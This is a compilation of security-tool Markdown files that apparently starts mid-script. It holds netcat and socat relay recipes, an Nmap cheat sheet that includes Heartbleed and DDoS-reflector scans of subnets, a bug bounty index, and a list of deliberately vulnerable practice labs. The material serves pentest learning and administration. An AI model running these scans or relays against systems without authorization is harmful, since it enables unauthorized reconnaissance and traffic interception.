"$_listen_port" "$_bk_host" "$_bk_port"
_tmp=$(mktemp -d)
_back="$_tmp/pipe.back"
_sent="$_tmp/pipe.sent"
_recv="$_tmp/pipe.recv"
trap 'rm -rf "$_tmp"' EXIT
mkfifo -m 0600 "$_back" "$_sent" "$_recv"
sed "s/^/=> /" <"$_sent" &
sed "s/^/<= /" <"$_recv" &
nc -l -p "$_listen_port" <"$_back" | \
tee "$_sent" | \
nc "$_bk_host" "$_bk_port" | \
tee "$_recv" >"$_back"
```
```bash
server> chmod +x nc-proxy && ./nc-proxy 8080 192.168.252.10:8000
lport: 8080
bk_host: 192.168.252.10
bk_port: 8000
client> http -p h 10.240.30.3:8080
HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=31536000
Content-Length: 2748
Content-Type: text/html; charset=utf-8
Date: Sun, 01 Jul 2018 20:12:08 GMT
Last-Modified: Sun, 01 Apr 2018 21:53:37 GMT
```
###### Create a single-use TCP or UDP proxy
```bash
### TCP -> TCP
nc -l -p 2000 -c "nc [ip|hostname] 3000"
### TCP -> UDP
nc -l -p 2000 -c "nc -u [ip|hostname] 3000"
### UDP -> UDP
nc -l -u -p 2000 -c "nc -u [ip|hostname] 3000"
### UDP -> TCP
nc -l -u -p 2000 -c "nc [ip|hostname] 3000"
```
___
##### Tool: [gnutls-cli](https://gnutls.org/manual/html_node/gnutls_002dcli-Invocation.html)
###### Testing connection to remote host (with SNI support)
```bash
gnutls-cli -p 443 google.com
```
###### Testing connection to remote host (without SNI support)
```bash
gnutls-cli --disable-sni -p 443 google.com
```
___
##### Tool: [socat](http://www.dest-unreach.org/socat/doc/socat.html)
###### Testing remote connection to port
```bash
socat - TCP4:10.240.30.3:22
```
* `-` - standard input (STDIO)
* `TCP4:<params>` - set tcp4 connection with specific params
* `[hostname|ip]` - set hostname/ip
* `[1-65535]` - set port number
###### Redirecting TCP-traffic to a UNIX domain socket under Linux
```bash
socat TCP-LISTEN:1234,bind=127.0.0.1,reuseaddr,fork,su=nobody,range=127.0.0.0/8 UNIX-CLIENT:/tmp/foo
```
* `TCP-LISTEN:<params>` - set tcp listen with specific params
* `[1-65535]` - set port number
* `bind=[hostname|ip]` - set bind hostname/ip
* `reuseaddr` - allows other sockets to bind to an address
* `fork` - keeps the parent process attempting to produce more connections
* `su=nobody` - set user
* `range=[ip-range]` - ip range
* `UNIX-CLIENT:<params>` - communicates with the specified peer socket
* `filename` - define socket
___
##### Tool: [p0f](http://lcamtuf.coredump.cx/p0f3/)
###### Set iface in promiscuous mode and dump traffic to the log file
```bash
p0f -i enp0s25 -p -d -o /dump/enp0s25.log
```
* `-i` - listen on the specified interface
* `-p` - set interface in promiscuous mode
* `-d` - fork into background
* `-o` - output file
___
##### Tool: [netstat](https://en.wikipedia.org/wiki/Netstat)
###### Graph # of connections for each hosts
```bash
netstat -an | awk '/ESTABLISHED/ { split($5,ip,":"); if (ip[1] !~ /^$/) print ip[1] }' | \
sort | uniq -c | awk '{ printf("%s\t%s\t",$2,$1) ; for (i = 0; i < $1; i++) {printf("*")}; print "" }'
```
###### Monitor open connections for specific port including listen, count and sort it per IP
```bash
watch "netstat -plan | grep :443 | awk {'print \$5'} | cut -d: -f 1 | sort | uniq -c | sort -nk 1"
```
###### Grab banners from local IPv4 listening ports
```bash
netstat -nlt | grep 'tcp ' | grep -Eo "[1-9][0-9]*" | xargs -I {} sh -c "echo "" | nc -v -n -w1 127.0.0.1 {}"
```
___
##### Tool: [rsync](https://en.wikipedia.org/wiki/Rsync)
###### Rsync remote data as root using sudo
```bash
rsync --rsync-path 'sudo rsync' username@hostname:/path/to/dir/ /local/
```
___
##### Tool: [host](https://en.wikipedia.org/wiki/Host_(Unix))
###### Resolves the domain name (using external dns server)
```bash
host google.com 9.9.9.9
```
###### Checks the domain administrator (SOA record)
```bash
host -t soa google.com 9.9.9.9
```
___
##### Tool: [dig](https://en.wikipedia.org/wiki/Dig_(command))
###### Resolves the domain name (short output)
```bash
dig google.com +short
```
###### Lookup NS record for specific domain
```bash
dig @9.9.9.9 google.com NS
```
###### Query only answer section
```bash
dig google.com +nocomments +noquestion +noauthority +noadditional +nostats
```
###### Query ALL DNS Records
```bash
dig google.com ANY +noall +answer
```
###### DNS Reverse Look-up
```bash
dig -x 172.217.16.14 +short
```
___
##### Tool: [certbot](https://certbot.eff.org/)
###### Generate multidomain certificate
```bash
certbot certonly -d example.com -d www.example.com
```
###### Generate wildcard certificate
```bash
certbot certonly --manual --preferred-challenges=dns -d example.com -d *.example.com
```
###### Generate certificate with 4096 bit private key
```bash
certbot certonly -d example.com -d www.example.com --rsa-key-size 4096
```
___
##### Tool: [network-other](https://github.com/trimstray/the-book-of-secret-knowledge#tool-network-other)
###### Get all subnets for specific AS (Autonomous system)
```bash
AS="AS32934"
whois -h whois.radb.net -- "-i origin ${AS}" | \
grep "^route:" | \
cut -d ":" -f2 | \
sed -e 's/^[ \t]//' | \
sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | \
cut -d ":" -f2 | \
sed -e 's/^[ \t]/allow /' | \
sed 's/$/;/' | \
sed 's/allow */subnet -> /g'
```
###### Resolves domain name from dns.google.com with curl and jq
```bash
_dname="google.com" ; curl -s "https://dns.google.com/resolve?name=${_dname}&type=A" | jq .
```
##### Tool: [git](https://git-scm.com/)
###### Log alias for a decent view of your repo
```bash
# 1)
git log --oneline --decorate --graph --all
# 2)
git log --graph \
--pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen(%cr) %C(bold blue)<%an>%Creset' \
--abbrev-commit
```
___
##### Tool: [python](https://www.python.org/)
###### Static HTTP web server
```bash
# Python 3.x
python3 -m http.server 8000 --bind 127.0.0.1
# Python 2.x
python -m SimpleHTTPServer 8000
```
###### Static HTTP web server with SSL support
```bash
# Python 3.x
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
httpd = HTTPServer(('localhost', 4443), BaseHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket,
keyfile="path/to/key.pem",
certfile='path/to/cert.pem', server_side=True)
httpd.serve_forever()
# Python 2.x
import BaseHTTPServer, SimpleHTTPServer
import ssl
httpd = BaseHTTPServer.HTTPServer(('localhost', 4443),
SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket,
keyfile="path/tp/key.pem",
certfile='path/to/cert.pem', server_side=True)
httpd.serve_forever()
```
###### Encode base64
```bash
python -m base64 -e <<< "sample string"
```
###### Decode base64
```bash
python -m base64 -d <<< "dGhpcyBpcyBlbmNvZGVkCg=="
```
##### Tool: [awk](http://www.grymoire.com/Unix/Awk.html)
###### Search for matching lines
```bash
# egrep foo
awk '/foo/' filename
```
###### Search non matching lines
```bash
# egrep -v foo
awk '!/foo/' filename
```
###### Print matching lines with numbers
```bash
# egrep -n foo
awk '/foo/{print FNR,$0}' filename
```
###### Print the last column
```bash
awk '{print $NF}' filename
```
###### Find all the lines longer than 80 characters
```bash
awk 'length($0)>80{print FNR,$0}' filename
```
###### Print only lines of less than 80 characters
```bash
awk 'length < 80 filename
```
###### Print double new lines a file
```bash
awk '1; { print "" }' filename
```
###### Print line numbers
```bash
awk '{ print FNR "\t" $0 }' filename
awk '{ printf("%5d : %s\n", NR, $0) }' filename # in a fancy manner
```
###### Print line numbers for only non-blank lines
```bash
awk 'NF { $0=++a " :" $0 }; { print }' filename
```
###### Print the line and the next two (i=5) lines after the line matching regexp
```bash
awk '/foo/{i=5+1;}{if(i){i--; print;}}' filename
```
###### Print the lines starting at the line matching 'server {' until the line matching '}'
```bash
awk '/server {/,/}/' filename
```
###### Print multiple columns with separators
```bash
awk -F' ' '{print "ip:\t" $2 "\n port:\t" $3' filename
```
###### Remove empty lines
```bash
awk 'NF > 0' filename
# alternative:
awk NF filename
```
###### Delete trailing white space (spaces, tabs)
```bash
awk '{sub(/[ \t]*$/, "");print}' filename
```
###### Delete leading white space
```bash
awk '{sub(/^[ \t]+/, ""); print}' filename
```
###### Remove duplicate consecutive lines
```bash
# uniq
awk 'a !~ $0{print}; {a=$0}' filename
```
###### Remove duplicate entries in a file without sorting
```bash
awk '!x[$0]++' filename
```
###### Exclude multiple columns
```bash
awk '{$1=$3=""}1' filename
```
###### Substitute foo for bar on lines matching regexp
```bash
awk '/regexp/{gsub(/foo/, "bar")};{print}' filename
```
###### Add some characters at the beginning of matching lines
```bash
awk '/regexp/{sub(/^/, "++++"); print;next;}{print}' filename
```
###### Get the last hour of Apache logs
```bash
awk '/'$(date -d "1 hours ago" "+%d\\/%b\\/%Y:%H:%M")'/,/'$(date "+%d\\/%b\\/%Y:%H:%M")'/ { print $0 }' \
/var/log/httpd/access_log
```
___
##### Tool: [sed](http://www.grymoire.com/Unix/Sed.html)
###### Print a specific line from a file
```bash
sed -n 10p /path/to/file
```
###### Remove a specific line from a file
```bash
sed -i 10d /path/to/file
# alternative (BSD): sed -i'' 10d /path/to/file
```
###### Remove a range of lines from a file
```bash
sed -i <file> -re '<start>,<end>d'
```
###### Replace newline(s) with a space
```bash
sed ':a;N;$!ba;s/\n/ /g' /path/to/file
# cross-platform compatible syntax:
sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/ /g' /path/to/file
```
- `:a` create a label `a`
- `N` append the next line to the pattern space
- `$!` if not the last line, ba branch (go to) label `a`
- `s` substitute, `/\n/` regex for new line, `/ /` by a space, `/g` global match (as many times as it can)
Alternatives:
```bash
# perl version (sed-like speed):
perl -p -e 's/\n/ /' /path/to/file
# bash version (slow):
while read line ; do printf "%s" "$line " ; done < file
```
###### Delete string +N next lines
```bash
sed '/start/,+4d' /path/to/file
```
___
##### Tool: [grep](http://www.grymoire.com/Unix/Grep.html)
###### Search for a "pattern" inside all files in the current directory
```bash
grep -rn "pattern"
grep -RnisI "pattern" *
fgrep "pattern" * -R
```
###### Show only for multiple patterns
```bash
grep 'INFO*'\''WARN' filename
grep 'INFO\|WARN' filename
grep -e INFO -e WARN filename
grep -E '(INFO|WARN)' filename
egrep "INFO|WARN" filename
```
###### Except multiple patterns
```bash
grep -vE '(error|critical|warning)' filename
```
###### Show data from file without comments
```bash
grep -v ^[[:space:]]*# filename
```
###### Show data from file without comments and new lines
```bash
egrep -v '#|^$' filename
```
###### Show strings with a dash/hyphen
```bash
grep -e -- filename
grep -- -- filename
grep "\-\-" filename
```
###### Remove blank lines from a file and save output to new file
```bash
grep . filename > newfilename
```
##### Tool: [perl](https://www.perl.org/)
###### Search and replace (in place)
```bash
perl -i -pe's/SEARCH/REPLACE/' filename
```
###### Edit of `*.conf` files changing all foo to bar (and backup original)
```bash
perl -p -i.orig -e 's/\bfoo\b/bar/g' *.conf
```
###### Prints the first 20 lines from `*.conf` files
```bash
perl -pe 'exit if $. > 20' *.conf
```
###### Search lines 10 to 20
```bash
perl -ne 'print if 10 .. 20' filename
```
###### Delete first 10 lines (and backup original)
```bash
perl -i.orig -ne 'print unless 1 .. 10' filename
```
###### Delete all but lines between foo and bar (and backup original)
```bash
perl -i.orig -ne 'print unless /^foo$/ .. /^bar$/' filename
```
###### Reduce multiple blank lines to a single line
```bash
perl -p -i -00pe0 filename
```
###### Convert tabs to spaces (1t = 2sp)
```bash
perl -p -i -e 's/\t/ /g' filename
```
###### Read input from a file and report number of lines and characters
```bash
perl -lne '$i++; $in += length($_); END { print "$i lines, $in characters"; }' filename
```
#### Shell functions [<sup>[TOC]</sup>](#anger-table-of-contents)
##### Table of Contents
- [Domain resolve](#domain-resolve)
- [Get ASN](#get-asn)
###### Domain resolve
```bash
# Dependencies:
# - curl
# - jq
function DomainResolve() {
local _host="$1"
local _curl_base="curl --request GET"
local _timeout="15"
_host_ip=$($_curl_base -ks -m "$_timeout" "https://dns.google.com/resolve?name=${_host}&type=A" | \
jq '.Answer[0].data' | tr -d "\"" 2>/dev/null)
if [[ -z "$_host_ip" ]] || [[ "$_host_ip" == "null" ]] ; then
echo -en "Unsuccessful domain name resolution.\\n"
else
echo -en "$_host > $_host_ip\\n"
fi
}
```
Example:
```bash
shell> DomainResolve nmap.org
nmap.org > 45.33.49.119
shell> DomainResolve nmap.org
Unsuccessful domain name resolution.
```
###### Get ASN
```bash
# Dependencies:
# - curl
function GetASN() {
local _ip="$1"
local _curl_base="curl --request GET"
local _timeout="15"
_asn=$($_curl_base -ks -m "$_timeout" "http://ip-api.com/line/${_ip}?fields=as")
_state=$(echo $?)
if [[ -z "$_ip" ]] || [[ "$_ip" == "null" ]] || [[ "$_state" -ne 0 ]]; then
echo -en "Unsuccessful ASN gathering.\\n"
else
echo -en "$_ip > $_asn\\n"
fi
}
```
Example:
```bash
shell> GetASN 1.1.1.1
1.1.1.1 > AS13335 Cloudflare, Inc.
shell> GetASN 0.0.0.0
Unsuccessful ASN gathering.
```
|
# Nmap-Cheat-Sheet
- Nmap Target Selection
```bash
Scan a single IP nmap 192.168.1.1
Scan a host nmap www.testhostname.com
Scan a range of IPs nmap 192.168.1.1-20
Scan a subnet nmap 192.168.1.0/24
Scan targets from a text file nmap -iL list-of-ips.txt
```
- Nmap Port Selection
```bash
Scan a single Port nmap -p 22 192.168.1.1
Scan a range of ports nmap -p 1-100 192.168.1.1
Scan 100 most common ports (Fast) nmap -F 192.168.1.1
Scan all 65535 ports nmap -p- 192.168.1.1
```
- Nmap Port Scan types
```bash
Scan using TCP connect nmap -sT 192.168.1.1
Scan using TCP SYN scan (default) nmap -sS 192.168.1.1
Scan UDP ports nmap -sU -p 123,161,162 192.168.1.1
Scan selected ports - ignore discovery nmap -Pn -F 192.168.1.1
```
- Service and OS Detection
```bash
Detect OS and Services nmap -A 192.168.1.1
Standard service detection nmap -sV 192.168.1.1
More aggressive Service Detection nmap -sV --version-intensity 5 192.168.1.1
Lighter banner grabbing detection nmap -sV --version-intensity 0 192.168.1.1
```
- Nmap Output Formats
```bash
Save default output to file nmap -oN outputfile.txt 192.168.1.1
Save results as XML nmap -oX outputfile.xml 192.168.1.1
Save results in a format for grep nmap -oG outputfile.txt 192.168.1.1
Save in all formats nmap -oA outputfile 192.168.1.1
```
- Digging deeper with NSE Scripts
```bash
Scan using default safe scripts nmap -sV -sC 192.168.1.1
Get help for a script nmap --script-help=ssl-heartbleed
Scan using a specific NSE script nmap -sV -p 443 –script=ssl-heartbleed.nse 192.168.1.1
Scan with a set of scripts nmap -sV --script=smb* 192.168.1.1
```
- A scan to search for DDOS reflection UDP services
```bash
Scan for UDP DDOS reflectors nmap –sU –A –PN –n –pU:19,53,123,161 –script=ntp-monlist,dns-recursion,snmp-sysdescr 192.168.1.0/24
```
- HTTP Service Information
```bash
Gather page titles from HTTP services nmap --script=http-title 192.168.1.0/24
Get HTTP headers of web services nmap --script=http-headers 192.168.1.0/24
Find web apps from known paths nmap --script=http-enum 192.168.1.0/24
```
- Detect Heartbleed SSL Vulnerability
```bash
Heartbleed Testing nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24
```
- IP Address information
```bash
Find Information about IP address nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24
```
- Scan port services from 1 to 65535
```bash
nmap -sV -p 1-65535 192.168.1.1/24
```
- All ports, all service versions, simple scripts = just the open
```bash
nmap -p- -sV -sC $IP --open
```
|
# Bug Bounty Cheat Sheet</h1>
| 📚 Reference | 🔎 Vulnerabilities |
|-------------------------------------------------------------|-----------------------------------------------------------|
| [Bug Bounty Platforms](cheatsheets/bugbountyplatforms.md) | [XSS](cheatsheets/xss.md) |
| [Books](cheatsheets/books.md) | [SQLi](cheatsheets/sqli.md) |
| [Special Tools](cheatsheets/special-tools.md) | [SSRF](cheatsheets/ssrf.md) |
| [Recon](cheatsheets/recon.md) | [CRLF Injection](cheatsheets/crlf.md) |
| [Practice Platforms](cheatsheets/practice-platforms.md) | [CSV Injection](cheatsheets/csv-injection.md) |
| [Bug Bounty Tips](cheatsheets/bugbountytips.md) | [LFI](cheatsheets/lfi.md) |
| | [XXE](cheatsheets/xxe.md) |
| | [RCE](cheatsheets/rce.md) |
| | [Open Redirect](cheatsheets/open-redirect.md) |
| | [Crypto](cheatsheets/crypto.md) |
| | [Template Injection](cheatsheets/template-injection.md) |
| | [Content Injection](cheatsheets/content-injection.md) |
| | [XSLT Injection](cheatsheets/xslt.md)
| | [Buffer Overflow Attack](cheatsheets/BOA.md)
# Contributing
We welcome contributions from the public.
### Using the issue tracker 💡
The issue tracker is the preferred channel for bug reports and features requests. [![GitHub issues](https://img.shields.io/github/issues/EdOverflow/bugbounty-cheatsheet.svg?style=flat-square)](https://github.com/EdOverflow/bugbounty-cheatsheet/issues)
### Issues and labels 🏷
Our bug tracker utilizes several labels to help organize and identify issues.
### Guidelines for bug reports 🐛
Use the GitHub issue search — check if the issue has already been reported.
# Style Guide
We like to keep our Markdown files as uniform as possible. So if you submit a PR, make sure to follow this style guide (we will not be angry if you do not).
- Cheat sheet titles should start with `##`.
- Subheadings should be made bold. (`**Subheading**`)
- Add newlines after subheadings and code blocks.
- Code blocks should use three backticks. (```)
- Make sure to use syntax highlighting whenever possible.
|
# Hackthebox Writeups
This are writeups for hackthebox.
|
# HTB Boxes <br/>
|No.| Machine Name | Difficulty | Operating Syatem Name |
|:--|:-------------|:-----------|:----------------------|
|1. | [**Doctor Walkthrough**](https://shubham-singh.medium.com/doctor-htb-walkthrough-70bcb9eedefd)| Easy | Linux |
|2. | [**Academy Walkthrough**](https://shubham-singh.medium.com/academy-hackthebox-walkthrough-9102c5d79dee)| Easy | Linux |
|3. | [**Armageddon Walkthrough**](https://shubham-singh.medium.com/armageddon-hackthebox-walkthrough-6d8e2261a676)| Easy | Linux |
|
# Awesome Vulnerable
[![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/sindresorhus/awesome)
![](https://visitor-badge.laobi.icu/badge?page_id=kaiiyer.awesome-vulnerable)
![Git Actions](https://github.com/kaiiyer/awesome-vulnerable/workflows/CI/badge.svg)
<a href='https://ind.ie/ethical-design'><img style='margin-left: auto; margin-right: auto;' alt='We practice Ethical Design' src='https://img.shields.io/badge/Ethical_Design-_▲_❤_-blue.svg'></a>
[![GitHub stars](https://img.shields.io/github/stars/kaiiyer/awesome-vulnerable)](https://github.com/kaiiyer/awesome-vulnerable/stargazers)
[![GitHub issues](https://img.shields.io/github/issues/kaiiyer/awesome-vulnerable.svg)](https://GitHub.com/kaiiyer/awesome-vulnerable/issues/)
[![GitHub pull-requests](https://img.shields.io/github/issues-pr/kaiiyer/awesome-vulnerable.svg)](https://GitHub.com/kaiiyer/awesome-vulnerable/pull/)
[![GitHub contributors](https://img.shields.io/github/contributors/kaiiyer/awesome-vulnerable.svg)](https://GitHub.com/kaiiyer/awesome-vulnerable/graphs/contributors/)
![Last Commit on GitHub](https://img.shields.io/github/last-commit/kaiiyer/awesome-vulnerable.svg)
<img src="https://octodex.github.com/images/grim-repo.jpg" alt="Octocat" width="210" height="225">
*A curated list of VULNERABLE APPS and SYSTEMS which can be used as PENETRATION TESTING PRACTICE LAB. This list aims to help starters as well as pros to test out and enhance their penetration skills.*
# Contents
- [Vulnerable Web Applications](#Vulnerable-Web-Applications)
- [Sites by Vendors of Security Testing Software](#Sites-by-Vendors-of-Security-Testing-Software)
- [Sites for Downloading Older Versions of Various Software](#Sites-for-Downloading-Older-Versions-of-Various-Software)
- [Sites for Improving Your Hacking Skills](#Sites-for-Improving-Your-Hacking-Skills)
- [Labs](#Labs)
- [Mobile Apps](#Mobile-Apps)
## Vulnerable Web Applications
- [BadStore](https://www.vulnhub.com/entry/badstore-123,41/) - Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure. Our Badstore demonstration software is designed to show you common hacking techniques.
- [BodgeIt Store](http://code.google.com/p/bodgeit/) - The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.
- [Bug Bounty Hunter](https://bugbountyhunter.com/) - BugBountyHunter is a training platform created by bug bounty hunter zseano designed to help you learn all about web application vulnerabilities and how to get started.
- [Butterfly Security Project](http://thebutterflytmp.sourceforge.net/) - The ButterFly project is an educational environment intended to give an insight into common web application and PHP vulnerabilities. The environment also includes examples demonstrating how such vulnerabilities are mitigated.
- [bWAPP](http://sourceforge.net/projects/bwapp/files/bee-box/) - bee-box is a custom Linux VM pre-installed with bWAPP.
- [CloudGoat](https://github.com/RhinoSecurityLabs/cloudgoat.git) - CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool
- [Commix](https://github.com/stasinopoulos/commix-testbed) - A collection of web pages, vulnerable to command injection flaws.
- [CryptOMG](https://github.com/SpiderLabs/CryptOMG) - CryptOMG is a configurable CTF style test bed that highlights common flaws in cryptographic implementations.
- [CTFchallenge](https://ctfchallenge.com/) - CTFchallenge s a collection of 12 vulnerable web applications, each one has its own realistic infrastructure built over several subdomains containing vulnerabilities based on bug reports, real world experiences or vulnerabilities found in the OWASP Top 10.
- [Damn Vulnerable Cloud Application](https://github.com/m6a-UdS/dvca.git) - Damn Vulnerable Cloud Application
- [Damn Vulnerable Node Application(DVNA)](https://github.com/appsecco/dvna) - Damn Vulnerable NodeJS Application
- [Damn Vulnerable Web App (DVWA)](http://www.dvwa.co.uk/) - Damn Vulnerablbe Web Application
- [Damn Vulnerable Web Services (DVWS)](https://github.com/snoopysecurity/dvws) -
Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities.
- [Firing Range](https://public-firing-range.appspot.com/) - a test bed created by Google for automated web application security scanners.
- [Foundstone Hackme Bank](https://www.mcafee.com/us/downloads/free-tools/hacme-bank.aspx) - Free McAfee tools to aid in your security protection.
- [Foundstone Hackme Books](https://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx) - Free McAfee tools to aid in your security protection.
- [Foundstone Hackme Casino](httsp://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx)- Free McAfee tools to aid in your security protection.
- [Foundstone Hackme Shipping](https://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx) - Free McAfee tools to aid in your security protection.
- [Foundstone Hackme Travel](https://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx) - Free McAfee tools to aid in your security protection.
- [GameOver](https://sourceforge.net/projects/null-gameover/) - Project GameOver was started with the objective of training and educating newbies about the basics of web security and educate them about the common web attacks and help them understand how they work.
- [hackxor](https://hackxor.sourceforge.net/cgi-bin/index.pl) - Hackxor is a realistic web application hacking game, designed to help players of all abilities develop their skills. All the missions are based on real vulnerabilities I've personally found while doing pentests, bug bounty hunting, and research.
- [Hackazon](https://github.com/rapid7/hackazon) - A modern vulnerable web app
- [LAMPSecurity](http://sourceforge.net/projects/lampsecurity/) - LAMPSecurity training is designed to be a series of vulnerable virtual machine images along with complementary documentation designed to teach linux,apache,php,mysql security.
- [OWASP Mantra](https://sourceforge.net/projects/getmantra/) - Free and Open Source Browser based Security Framework, is a collection of free and open source tools integrated into a web browser, which can become handy for penetration testers, web application developers, security professionals etc.
- [NOWASP / Mutillidae 2](https://github.com/webpwnized/mutillidae) - OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
- [OWASP BWA](http://code.google.com/p/owaspbwa/) - A collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost VMware Player and VMware vSphere Hypervisor (ESXi) products (along with their older and commercial products).
- [OWASP Hackademic](https://github.com/Hackademic/hackademic/) - Project helps you test your knowledge on web application security. You can use it to actually attack web applications in a realistic but also controllable and safe environment.
- [OWASP SiteGenerator](https://www.owasp.org/index.php/Owasp_SiteGenerator) - OWASP SiteGenerator allows the creating of dynamic websites based on XML files and predefined vulnerabilities (some simple, some complex) covering .Net languages and web development architectures (for example, navigation: Html, Javascript, Flash, Java, etc).
- [OWASP Bricks](https://sourceforge.net/projects/owaspbricks/) - Web application security learning platform built on PHP and MySQL
- [OWASP Security Shepherd](https://www.owasp.org/index.php/OWASP_Security_Shepherd) - OWASP Security Shepherd is a web and mobile application security training platform. Security Shepherd has been designed to foster and improve security awareness among a varied skill-set demographic
- [PentesterLab](https://pentesterlab.com/) - We make learning web hacking easier!
- [SecuriBench](https://suif.stanford.edu/~livshits/securibench/) - Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java.
- [SentinelTestbed](https://github.com/dobin/SentinelTestbed) - Vulnerable web site. Used to test sentinel features.
- [SocketToMe](http://digi.ninja/projects/sockettome.php) - It combines chat, a simple number guessing game and a few other hidden features
- [sqli-labs](https://github.com/Audi-1/sqli-labs) - SQLI labs to test error based, Blind boolean based, Time based.
- [MCIR (Magical Code Injection Rainbow)](https://github.com/SpiderLabs/MCIR) - The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds
- [Sqlilabs](https://github.com/himadriganguly/sqlilabs) - Lab set-up for learning SQL Injection Techniques
- [VulnApp](https://www.nth-dimension.org.uk/blog.php?id=88) - ASP.net application implementing some of the most common applications we come across on our penetration testing engagements
- [VulnLab](https://github.com/Yavuzlar/VulnLab) - A vulnerable web application lab using Docker
- [PuzzleMall](https://code.google.com/p/puzzlemall/) - A vulnerable web application for practicing session puzzling
- [WackoPicko](https://github.com/adamdoupe/WackoPicko) - WackoPicko is a vulnerable web application used to test web application vulnerability scanners
- [WebGoat.NET](https://github.com/jerryhoff/WebGoat.NET/) - This web application is a learning platform that attempts to teach about common web security flaws. It contains generic security flaws that apply to most web applications
- [OWASP WebGoat8](https://github.com/webgoat/webgoat) - OWASP Webgoat 8 is a learning platform that attempts to teach about common web security flaws. It contains generic security flaws that apply to most web applications, is written in Java and is actively maintained.
- [OWASP WrongSecrets](https://github.com/commjoen/wrongsecrets) - OWASP WrongSecrets is a vulnerable app which shows how to not store secrets, and helps you to improve your secrets-hunting skills.
- [WebSecurity Dojo](https://www.mavensecurity.com/web_security_dojo/) - A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
- [XVWA](https://github.com/s4n7h0/xvwa) - XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security.
- [Zap WAVE](https://code.google.com/p/zaproxy/downloads/detail?name=zap-wave-0.1.zip) - An easy to use integrated penetration testing tool for finding vulnerabilities in web applications
- [Web-Security Academy](https://portswigger.net/web-security) - A free platform for learining and testing your Web Application security skills with practice labs and learning materials by Portswigger
- [OWASP Juice Shop](https://github.com/juice-shop/juice-shop) - An Open Source platform for testing Web-Application Security skills. The application contains a vast number of hacking challenges of varying difficulty level
- [tegal1337/0l4bs](https://github.com/tegal1337/0l4bs) - Cross-site scripting (XSS) labs for web application security enthusiasts
- [tegal1337/br0w](https://github.com/tegal1337/br0w) - Hack The Br0w. Play your browser and learn more, hack fun!
## Sites for Downloading Older Versions of Various Software
- [Exploit-DB](http://www.exploit-db.com/) - The Exploit Database is maintained by Offensive Security, an information security training company that provides various Information Security Certifications as well as high end penetration testing services
- [Old Apps](http://www.oldapps.com/) - Provide our users with a wide assortment of current versions of familiar software, and their predecessors for free
- [Old Version](http://www.oldversion.com/) - Pick a software title... to downgrade to the version you love!
- [VirtualHacking Repo ](https://sourceforge.net/projects/virtualhacking/files/apps@realworld/) - Virtual Hacking Lab
- [All Version](http://www.PortableApps.com/) - PortableApps is the world's most popular portable software solution allowing you to take your favorite software with you
## Sites by Vendors of Security Testing Software
- [Acunetix acuforum](https://testasp.vulnweb.com/) - A forum deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks
- [Acunetix acublog](https://testaspnet.vulnweb.com/) - A test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more
- [Acunetix acuart](https://testphp.vulnweb.com/) -This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix
- [Acunetix SecurityTweets](http://testhtml5.vulnweb.com) - Vulnerable HTML5 test website for Acunetix Web Vulnerability Scanner.
- [Cenzic crackmebank](http://crackme.cenzic.com) - This is a test and demonstration site
- [HP freebank](http://zero.webappsecurity.com) - The Free Online Bank Web site is published by Micro Focus Fortify for the sole purpose of demonstrating the functionality and effectiveness of Micro Focus Fortify’s WebInspect products in detecting and reporting Web application vulnerabilities.
- [IBM altoromutual](http://demo.testfire.net/) - The AltoroJ website is published by IBM Corporation for the sole purpose of demonstrating the effectiveness of IBM products in detecting web application vulnerabilities and website defects
- [Mavituna testsparker](http://aspnet.testsparker.com) - This is a test and demonstration site for Netsparker
- [Mavituna testsparker](http://php.testsparker.com) - This is a test and demonstration site for Netsparker , Next Generation Web Application Security Scanner. Start Netsparker to scan this web site and let it find the vulnerabilities
- [Mavituna testsparker](http://angular.testsparker.com) - This is a test and demonstration site for Netsparker
- [NTOSpider Test Site](http://www.webscantest.com/) - This site is setup to test automated Web Application scanners like AppSpider
## Sites for Improving Your Hacking Skills
- [Blue Team Labs Online - Cyber Range](https://blueteamlabs.online/) -A gamified platform for defenders to practice their skills in security investigations and challenges covering; Incident Response, Digital Forensics, Security Operations, Reverse Engineering, and Threat Hunting.
- [Embedded Security CTF](https://microcorruption.com) - Scattered throughout the world in locked warehouses are briefcases filled with Cy Yombinator bearer bonds that could be worth billions comma billions of dollars. You will help steal the briefcases
- [EnigmaGroup](http://www.enigmagroup.org/) - Enigma Group has been providing its members a legal and safe security resource where they can develop their pen-testing skills on various challenges provided by this site
- [Escape](http://escape.alf.nu/) - The code generates HTML in an unsafe way. Prove it by calling alert(1)
- [Google Gruyere](http://google-gruyere.appspot.com/) - This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks
